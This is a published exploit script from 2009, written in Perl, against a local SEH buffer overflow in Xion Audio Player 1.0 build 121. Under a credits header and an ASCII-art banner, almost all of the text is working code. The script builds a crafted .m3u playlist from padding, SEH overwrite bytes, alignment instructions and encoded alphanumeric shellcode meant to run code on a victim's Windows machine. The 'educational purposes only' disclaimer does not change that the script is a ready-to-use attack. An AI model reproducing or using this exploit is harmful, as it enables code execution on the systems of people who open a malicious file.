Xion Audio Player version 1.0 build 121 local buffer overflow exploit
Source: corelanc0d3r[at]gmail.com Author: corelanc0d3r Published: 2009-11-04
# [*] Vulnerability     : Xion Audio Player Local BOF
# [*] Discovered by     : Dragon Rider (http://securityreason.com/exploitalert/7392)
# [*]                     drag0n.rider(at)hotmail.com
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : nov 3rd, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : Xion Audio Player
# [*] Versions affected : 1.0 build 121
# [*] Download from     : http://www.brothersoft.com/xion-audio-player-download-49404.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH
# [*] Tested on         : XP SP3 En
# [*] Greetz&Tx to      : DellNull/EdiStrosar/F/P/W
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#
my $sploitfile="corelansploit.m3u";
my $junk = "\x41" x 254;  
my $nseh="\x58\x48"; 
my $seh="\xf5\x48"; 
my $align="\x55";  
$align=$align."\x6d";   
$align=$align."\x58";   
$align=$align."\x6d";   
$align = $align."\x05\x10\x11";   
$align=$align."\x6d";  
$align=$align."\x2d\x02\x11";  
$align=$align."\x6d";   

my $jump = "\x50";  
$jump=$jump."\x6d"; 
$jump=$jump."\xc3";

my $padding="A" x 73;

my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8Q4KPKPKP4KQ5OLTKSLLERXM1JOTK0OLXDK1OO0M1JKPITK044KKQJN01WPTYVLE4Y0BTKW91WZLMKQ7RJKZTOKB4NDLDCE9UDKQOMTKQJKRFDKLLPKTKQOMLKQJKTKMLDKKQZKSYQLO4M4WSNQGPBDTKOPNPSUY0D8LLTKOPLLTKRPML6MTK2HKXZKM94K3PVPKPKPKPDK1XOL1ONQJVC0PVTIL853WP3K0PBHZPTJKTQO2HV8KNSZLNPWKOYWQSQQRLQSKPA";

my $filler = ("\xcc" x (17990-length($shellcode)));
my $payload = $junk.$nseh.$seh.$align.$jump.$padding.$shellcode.$filler;
open(myfile,">$sploitfile"); 
print myfile $payload; 
print "Wrote " . length($payload)." bytes to $sploitfile\n";
close(myfile);
